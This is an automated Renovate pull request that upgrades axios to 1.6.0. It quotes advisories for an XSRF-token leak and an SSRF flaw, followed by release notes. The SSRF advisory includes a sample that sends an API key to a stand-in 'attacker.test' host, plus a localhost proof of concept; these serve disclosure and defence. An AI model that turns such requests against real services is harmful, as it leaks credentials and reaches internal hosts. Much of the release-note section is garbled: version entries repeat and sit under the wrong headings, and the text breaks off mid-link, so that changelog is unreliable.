Update dependency axios to v1.6.0 [SECURITY]

[renovate]

ℹ️ Note

This PR body was truncated due to platform limits.

This PR contains the following updates:

Package	Change	Age	Confidence
axios (source)	1.1.3 → 1.6.0

GitHub Vulnerability Alerts

CVE-2023-45857

An issue discovered in Axios 0.8.1 through 1.5.1 inadvertently reveals the confidential XSRF-TOKEN stored in cookies by including it in the HTTP header X-XSRF-TOKEN for every request made to any host allowing attackers to view sensitive information.

CVE-2025-27152

Summary

A previously reported issue in axios demonstrated that using protocol-relative URLs could lead to SSRF (Server-Side Request Forgery). Reference: axios/axios#6463

A similar problem that occurs when passing absolute URLs rather than protocol-relative URLs to axios has been identified. Even if ⁠baseURL is set, axios sends the request to the specified absolute URL, potentially causing SSRF and credential leakage. This issue impacts both server-side and client-side usage of axios.

Details

Consider the following code snippet:

import axios from "axios";

const internalAPIClient = axios.create({
  baseURL: "http://example.test/api/v1/users/",
  headers: {
    "X-API-KEY": "1234567890",
  },
});

// const userId = "123";
const userId = "http://attacker.test/";

await internalAPIClient.get(userId); // SSRF

In this example, the request is sent to http://attacker.test/ instead of the baseURL. As a result, the domain owner of attacker.test would receive the X-API-KEY included in the request headers.

It is recommended that:

• When baseURL is set, passing an absolute URL such as http://attacker.test/ to get() should not ignore baseURL.
• Before sending the HTTP request (after combining the baseURL with the user-provided parameter), axios should verify that the resulting URL still begins with the expected baseURL.

PoC

Follow the steps below to reproduce the issue:

1. Set up two simple HTTP servers:

mkdir /tmp/server1 /tmp/server2
echo "this is server1" > /tmp/server1/index.html 
echo "this is server2" > /tmp/server2/index.html
python -m http.server -d /tmp/server1 10001 &
python -m http.server -d /tmp/server2 10002 &

2. Create a script (e.g., main.js):

import axios from "axios";
const client = axios.create({ baseURL: "http://localhost:10001/" });
const response = await client.get("http://localhost:10002/");
console.log(response.data);

3. Run the script:

$ node main.js
this is server2

Even though baseURL is set to http://localhost:10001/, axios sends the request to http://localhost:10002/.

Impact

• Credential Leakage: Sensitive API keys or credentials (configured in axios) may be exposed to unintended third-party hosts if an absolute URL is passed.
• SSRF (Server-Side Request Forgery): Attackers can send requests to other internal hosts on the network where the axios program is running.
• Affected Users: Software that uses baseURL and does not validate path parameters is affected by this issue.

---

Release Notes

axios/axios (axios)

v1.6.0

Compare Source

Features

• adapter: add fetch adapter; (#​6371) (a3ff99b)

Contributors to this release

• Dmitriy Mozgovoy
• Jay

1.6.8 (2024-03-15)

Bug Fixes

• AxiosHeaders: fix AxiosHeaders conversion to an object during config merging (#​6243) (2656612)
• import: use named export for EventEmitter; (7320430)
• vulnerability: update follow-redirects to 1.15.6 (#​6300) (8786e0f)

Contributors to this release

• Jay
• Dmitriy Mozgovoy
• Mitchell
• Emmanuel
• Lucas Keller
• Aditya Mogili
• Miroslav Petrov

1.6.7 (2024-01-25)

Bug Fixes

• capture async stack only for rejections with native error objects; (#​6203) (1a08f90)

Contributors to this release

• Dmitriy Mozgovoy
• zhoulixiang

1.6.6 (2024-01-24)

Bug Fixes

• fixed missed dispatchBeforeRedirect argument (#​5778) (a1938ff)
• wrap errors to improve async stack trace (#​5987) (123f354)

Contributors to this release

• Ilya Priven
• Zao Soula

1.6.5 (2024-01-05)

Bug Fixes

• ci: refactor notify action as a job of publish action; (#​6176) (0736f95)
• dns: fixed lookup error handling; (#​6175) (f4f2b03)

Contributors to this release

• Dmitriy Mozgovoy
• Jay

1.6.4 (2024-01-03)

Bug Fixes

• security: fixed formToJSON prototype pollution vulnerability; (#​6167) (3c0c11c)
• security: fixed security vulnerability in follow-redirects (#​6163) (75af1cd)

Contributors to this release

• Jay
• Dmitriy Mozgovoy
• Guy Nesher

1.6.3 (2023-12-26)

Bug Fixes

• Regular Expression Denial of Service (ReDoS) (#​6132) (5e7ad38)

Contributors to this release

• Jay
• Willian Agostini
• Dmitriy Mozgovoy

1.6.2 (2023-11-14)

Features

• withXSRFToken: added withXSRFToken option as a workaround to achieve the old withCredentials behavior; (#​6046) (cff9967)

PRs

• feat(withXSRFToken): added withXSRFToken option as a workaround to achieve the old `withCredentials` behavior; ( #​6046 )

📢 This PR added 'withXSRFToken' option as a replacement for old withCredentials behaviour. 
You should now use withXSRFToken along with withCredential to get the old behavior.
This functionality is considered as a fix.

Contributors to this release

• Dmitriy Mozgovoy
• Ng Choon Khon (CK)
• Muhammad Noman

1.6.1 (2023-11-08)

Bug Fixes

• formdata: fixed content-type header normalization for non-standard browser environments; (#​6056) (dd465ab)
• platform: fixed emulated browser detection in node.js environment; (#​6055) (3dc8369)

Contributors to this release

• Dmitriy Mozgovoy
• Fabian Meyer

PRs

• feat(withXSRFToken): added withXSRFToken option as a workaround to achieve the old `withCredentials` behavior; ( #​6046 )

📢 This PR added 'withXSRFToken' option as a replacement for old withCredentials behaviour. 
You should now use withXSRFToken along with withCredential to get the old behavior.
This functionality is considered as a fix.

v1.5.1

Compare Source

Bug Fixes

• CSRF: fixed CSRF vulnerability CVE-2023-45857 (#​6028) (96ee232)
• dns: fixed lookup function decorator to work properly in node v20; (#​6011) (5aaff53)
• types: fix AxiosHeaders types; (#​5931) (a1c8ad0)

PRs

• CVE 2023 45857 ( #​6028 )

⚠️ Critical vulnerability fix. See https://security.snyk.io/vuln/SNYK-JS-AXIOS-6032459

Contributors to this release

• Dmitriy Mozgovoy
• Valentin Panov
• Rinku Chaudhari

1.5.1 (2023-09-26)

Bug Fixes

• adapters: improved adapters loading logic to have clear error messages; (#​5919) (e410779)
• formdata: fixed automatic addition of the Content-Type header for FormData in non-browser environments; (#​5917) (bc9af51)
• headers: allow content-encoding header to handle case-insensitive values (#​5890) (#​5892) (4c89f25)
• types: removed duplicated code (9e62056)

Contributors to this release

• Dmitriy Mozgovoy
• David Dallas
• Sean Sattler
• Mustafa Ateş Uzun
• Przemyslaw Motacki
• Michael Di Prisco

PRs

• CVE 2023 45857 ( #​6028 )

⚠️ Critical vulnerability fix. See https://security.snyk.io/vuln/SNYK-JS-AXIOS-6032459

v1.5.0

Compare Source

Bug Fixes

• CSRF: fixed CSRF vulnerability CVE-2023-45857 (#​6028) (96ee232)
• dns: fixed lookup function decorator to work properly in node v20; (#​6011) (5aaff53)
• types: fix AxiosHeaders types; (#​5931) (a1c8ad0)

PRs

• CVE 2023 45857 ( #​6028 )

⚠️ Critical vulnerability fix. See https://security.snyk.io/vuln/SNYK-JS-AXIOS-6032459

Contributors to this release

• Dmitriy Mozgovoy
• Valentin Panov
• Rinku Chaudhari

1.5.1 (2023-09-26)

Bug Fixes

• adapters: improved adapters loading logic to have clear error messages; (#​5919) (e410779)
• formdata: fixed automatic addition of the Content-Type header for FormData in non-browser environments; (#​5917) (bc9af51)
• headers: allow content-encoding header to handle case-insensitive values (#​5890) (#​5892) (4c89f25)
• types: removed duplicated code (9e62056)

Contributors to this release

• Dmitriy Mozgovoy
• David Dallas
• Sean Sattler
• Mustafa Ateş Uzun
• Przemyslaw Motacki
• Michael Di Prisco

PRs

• CVE 2023 45857 ( #​6028 )

⚠️ Critical vulnerability fix. See https://security.snyk.io/vuln/SNYK-JS-AXIOS-6032459

v1.4.0

Compare Source

Bug Fixes

• formdata: add multipart/form-data content type for FormData payload on custom client environments; (#​5678) (bbb61e7)
• package: export package internals with unsafe path prefix; (#​5677) (df38c94)

Features

• dns: added support for a custom lookup function; (#​5339) (2701911)
• types: export AxiosHeaderValue type. (#​5525) (726f1c8)

Performance Improvements

• merge-config: optimize mergeConfig performance by avoiding duplicate key visits; (#​5679) (e6f7053)

Contributors to this release

• Dmitriy Mozgovoy
• Arthur Fiorette
• PIYUSH NEGI

PRs

• CVE 2023 45857 ( #​6028 )

⚠️ Critical vulnerability fix. See https://security.snyk.io/vuln/SNYK-JS-AXIOS-6032459

1.3.6 (2023-04-19)

Bug Fixes

• types: added transport to RawAxiosRequestConfig (#​5445) (6f360a2)
• utils: make isFormData detection logic stricter to avoid unnecessary calling of the toString method on the target; (#​5661) (aa372f7)

Contributors to this release

• Dmitriy Mozgovoy
• Michael Di Prisco

PRs

• CVE 2023 45857 ( #​6028 )

⚠️ Critical vulnerability fix. See https://security.snyk.io/vuln/SNYK-JS-AXIOS-6032459

1.3.5 (2023-04-05)

Bug Fixes

• headers: fixed isValidHeaderName to support full list of allowed characters; (#​5584) (e7decef)
• params: re-added the ability to set the function as paramsSerializer config; (#​5633) (a56c866)

Contributors to this release

• Dmitriy Mozgovoy

PRs

• CVE 2023 45857 ( #​6028 )

⚠️ Critical vulnerability fix. See https://security.snyk.io/vuln/SNYK-JS-AXIOS-6032459

1.3.4 (2023-02-22)

Bug Fixes

• blob: added a check to make sure the Blob class is available in the browser's global scope; (#​5548) (3772c8f)
• http: fixed regression bug when handling synchronous errors inside the adapter; (#​5564) (a3b246c)

Contributors to this release

• Dmitriy Mozgovoy
• lcysgsg
• Michael Di Prisco

PRs

• CVE 2023 45857 ( #​6028 )

⚠️ Critical vulnerability fix. See https://security.snyk.io/vuln/SNYK-JS-AXIOS-6032459

1.3.3 (2023-02-13)

Bug Fixes

• formdata: added a check to make sure the FormData class is available in the browser's global scope; (#​5545) (a6dfa72)
• formdata: fixed setting NaN as Content-Length for form payload in some cases; (#​5535) (c19f7bf)
• headers: fixed the filtering logic of the clear method; (#​5542) (ea87ebf)

Contributors to this release

• Dmitriy Mozgovoy
• 陈若枫

PRs

• CVE 2023 45857 ( #​6028 )

⚠️ Critical vulnerability fix. See https://security.snyk.io/vuln/SNYK-JS-AXIOS-6032459

1.3.2 (2023-02-03)

Bug Fixes

• http: treat http://localhost as base URL for relative paths to avoid ERR_INVALID_URL error; (#​5528) (128d56f)
• http: use explicit import instead of TextEncoder global; (#​5530) (6b3c305)

Contributors to this release

• Dmitriy Mozgovoy

PRs

• CVE 2023 45857 ( #​6028 )

⚠️ Critical vulnerability fix. See https://security.snyk.io/vuln/SNYK-JS-AXIOS-6032459

1.3.1 (2023-02-01)

Bug Fixes

• formdata: add hotfix to use the asynchronous API to compute the content-length header value; (#​5521) (96d336f)
• serializer: fixed serialization of array-like objects; (#​5518) (08104c0)

Contributors to this release

• Dmitriy Mozgovoy

PRs

• CVE 2023 45857 ( #​6028 )

⚠️ Critical vulnerability fix. See https://security.snyk.io/vuln/SNYK-JS-AXIOS-6032459

v1.3.6

Compare Source

Bug Fixes

• formdata: add multipart/form-data content type for FormData payload on custom client environments; (#​5678) (bbb61e7)
• package: export package internals with unsafe path prefix; (#​5677) (df38c94)

Features

• dns: added support for a custom lookup function; (#​5339) (2701911)
• types: export AxiosHeaderValue type. (#​5525) (726f1c8)

Performance Improvements

• merge-config: optimize mergeConfig performance by avoiding duplicate key visits; (#​5679) (e6f7053)

Contributors to this release

• Dmitriy Mozgovoy
• Arthur Fiorette
• PIYUSH NEGI

PRs

• CVE 2023 45857 ( #​6028 )

⚠️ Critical vulnerability fix. See https://security.snyk.io/vuln/SNYK-JS-AXIOS-6032459

1.3.6 (2023-04-19)

Bug Fixes

• types: added transport to RawAxiosRequestConfig (#​5445) (6f360a2)
• utils: make isFormData detection logic stricter to avoid unnecessary calling of the toString method on the target; (#​5661) (aa372f7)

Contributors to this release

• Dmitriy Mozgovoy
• Michael Di Prisco

PRs

• CVE 2023 45857 ( #​6028 )

⚠️ Critical vulnerability fix. See https://security.snyk.io/vuln/SNYK-JS-AXIOS-6032459

1.3.5 (2023-04-05)

Bug Fixes

• headers: fixed isValidHeaderName to support full list of allowed characters; (#​5584) (e7decef)
• params: re-added the ability to set the function as paramsSerializer config; (#​5633) (a56c866)

Contributors to this release

• Dmitriy Mozgovoy

PRs

• CVE 2023 45857 ( #​6028 )

⚠️ Critical vulnerability fix. See https://security.snyk.io/vuln/SNYK-JS-AXIOS-6032459

1.3.4 (2023-02-22)

Bug Fixes

• blob: added a check to make sure the Blob class is available in the browser's global scope; (#​5548) (3772c8f)
• http: fixed regression bug when handling synchronous errors inside the adapter; (#​5564) (a3b246c)

Contributors to this release

• Dmitriy Mozgovoy
• lcysgsg
• Michael Di Prisco

PRs

• CVE 2023 45857 ( #​6028 )

⚠️ Critical vulnerability fix. See https://security.snyk.io/vuln/SNYK-JS-AXIOS-6032459

1.3.3 (2023-02-13)

Bug Fixes

• formdata: added a check to make sure the FormData class is available in the browser's global scope; (#​5545) (a6dfa72)
• formdata: fixed setting NaN as Content-Length for form payload in some cases; (#​5535) (c19f7bf)
• headers: fixed the filtering logic of the clear method; (#​5542) (ea87ebf)

Contributors to this release

• Dmitriy Mozgovoy
• 陈若枫

PRs

• CVE 2023 45857 ( #​6028 )

⚠️ Critical vulnerability fix. See https://security.snyk.io/vuln/SNYK-JS-AXIOS-6032459

1.3.2 (2023-02-03)

Bug Fixes

• http: treat http://localhost as base URL for relative paths to avoid ERR_INVALID_URL error; (#​5528) (128d56f)
• http: use explicit import instead of TextEncoder global; (#​5530) (6b3c305)

Contributors to this release

• Dmitriy Mozgovoy

PRs

• CVE 2023 45857 ( #​6028 )

⚠️ Critical vulnerability fix. See https://security.snyk.io/vuln/SNYK-JS-AXIOS-6032459

1.3.1 (2023-02-01)

Bug Fixes

• formdata: add hotfix to use the asynchronous API to compute the content-length header value; (#​5521) (96d336f)
• serializer: fixed serialization of array-like objects; (#​5518) (08104c0)

Contributors to this release

• Dmitriy Mozgovoy

PRs

• CVE 2023 45857 ( #​6028 )

⚠️ Critical vulnerability fix. See https://security.snyk.io/vuln/SNYK-JS-AXIOS-6032459

v1.3.5

Compare Source

Bug Fixes

• formdata: add multipart/form-data content type for FormData payload on custom client environments; (#​5678) (bbb61e7)
• package: export package internals with unsafe path prefix; (#​5677) (df38c94)

Features

• dns: added support for a custom lookup function; (#​5339) (2701911)
• types: export AxiosHeaderValue type. (#​5525) (726f1c8)

Performance Improvements

• merge-config: optimize mergeConfig performance by avoiding duplicate key visits; (#​5679) (e6f7053)

Contributors to this release

• Dmitriy Mozgovoy
• Arthur Fiorette
• PIYUSH NEGI

PRs

• CVE 2023 45857 ( #​6028 )

⚠️ Critical vulnerability fix. See https://security.snyk.io/vuln/SNYK-JS-AXIOS-6032459

1.3.6 (2023-04-19)

Bug Fixes

• types: added transport to RawAxiosRequestConfig (#​5445) (6f360a2)
• utils: make isFormData detection logic stricter to avoid unnecessary calling of the toString method on the target; (#​5661) (aa372f7)

Contributors to this release

• Dmitriy Mozgovoy
• Michael Di Prisco

PRs

• CVE 2023 45857 ( #​6028 )

⚠️ Critical vulnerability fix. See https://security.snyk.io/vuln/SNYK-JS-AXIOS-6032459

1.3.5 (2023-04-05)

Bug Fixes

• headers: fixed isValidHeaderName to support full list of allowed characters; (#​5584) (e7decef)
• params: re-added the ability to set the function as paramsSerializer config; (#​5633) (a56c866)

Contributors to this release

• Dmitriy Mozgovoy

PRs

• CVE 2023 45857 ( #​6028 )

⚠️ Critical vulnerability fix. See https://security.snyk.io/vuln/SNYK-JS-AXIOS-6032459

1.3.4 (2023-02-22)

Bug Fixes

• blob: added a check to make sure the Blob class is available in the browser's global scope; (#​5548) (3772c8f)
• http: fixed regression bug when handling synchronous errors inside the adapter; (#​5564) (a3b246c)

Contributors to this release

• Dmitriy Mozgovoy
• lcysgsg
• Michael Di Prisco

PRs

• CVE 2023 45857 ( #​6028 )

⚠️ Critical vulnerability fix. See https://security.snyk.io/vuln/SNYK-JS-AXIOS-6032459

1.3.3 (2023-02-13)

Bug Fixes

• formdata: added a check to make sure the FormData class is available in the browser's global scope; (#​5545) (a6dfa72)
• formdata: fixed setting NaN as Content-Length for form payload in some cases; (#​5535) (c19f7bf)
• headers: fixed the filtering logic of the clear method; (#​5542) (ea87ebf)

Contributors to this release

• Dmitriy Mozgovoy
• 陈若枫

PRs

• CVE 2023 45857 ( #​6028 )

⚠️ Critical vulnerability fix. See https://security.snyk.io/vuln/SNYK-JS-AXIOS-6032459

1.3.2 (2023-02-03)

Bug Fixes

• http: treat http://localhost as base URL for relative paths to avoid ERR_INVALID_URL error; (#​5528) (128d56f)
• http: use explicit import instead of TextEncoder global; (#​5530) (6b3c305)

Contributors to this release

• Dmitriy Mozgovoy

PRs

• CVE 2023 45857 ( #​6028 )

⚠️ Critical vulnerability fix. See https://security.snyk.io/vuln/SNYK-JS-AXIOS-6032459

1.3.1 (2023-02-01)

Bug Fixes

• formdata: add hotfix to use the asynchronous API to compute the content-length header value; (#​5521) (96d336f)
• serializer: fixed serialization of array-like objects; (#​5518) (08104c0)

Contributors to this release

• Dmitriy Mozgovoy

PRs

• CVE 2023 45857 ( #​6028 )

⚠️ Critical vulnerability fix. See https://security.snyk.io/vuln/SNYK-JS-AXIOS-6032459

v1.3.4

Compare Source

Bug Fixes

• formdata: add multipart/form-data content type for FormData payload on custom client environments; (#​5678) (bbb61e7)
• package: export package internals with unsafe path prefix; (#​5677) (df38c94)

Features

• dns: added support for a custom lookup function; (#​5339) (2701911)
• types: export AxiosHeaderValue type. (#​5525) (726f1c8)

Performance Improvements

• merge-config: optimize mergeConfig performance by avoiding duplicate key visits; (#​5679) (e6f7053)

Contributors to this release

• Dmitriy Mozgovoy
• Arthur Fiorette
• PIYUSH NEGI

PRs

• CVE 2023 45857 ( #​6028 )

⚠️ Critical vulnerability fix. See https://security.snyk.io/vuln/SNYK-JS-AXIOS-6032459

1.3.6 (2023-04-19)

Bug Fixes

• types: added transport to RawAxiosRequestConfig (#​5445) (6f360a2)
• utils: make isFormData detection logic stricter to avoid unnecessary calling of the toString method on the target; (#​5661) (aa372f7)

Contributors to this release

• Dmitriy Mozgovoy
• Michael Di Prisco

PRs

• CVE 2023 45857 ( #​6028 )

⚠️ Critical vulnerability fix. See https://security.snyk.io/vuln/SNYK-JS-AXIOS-6032459

1.3.5 (2023-04-05)

Bug Fixes

• headers: fixed isValidHeaderName to support full list of allowed characters; (#​5584) (e7decef)
• params: re-added the ability to set the function as paramsSerializer config; (#​5633) (a56c866)

Contributors to this release

• Dmitriy Mozgovoy

PRs

• CVE 2023 45857 ( #​6028 )

⚠️ Critical vulnerability fix. See https://security.snyk.io/vuln/SNYK-JS-AXIOS-6032459

1.3.4 (2023-02-22)

Bug Fixes

• blob: added a check to make sure the Blob class is available in the browser's global scope; (#​5548) ([3772c8f](https://redirect.github.com/axios/axios/commit/3772c8fe74112a56e3e9551

---

Configuration

📅 Schedule: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

♻ Rebasing: Whenever PR is behind base branch, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

---

• If you want to rebase/retry this PR, check this box

---

This PR was generated by Mend Renovate. View the repository job log.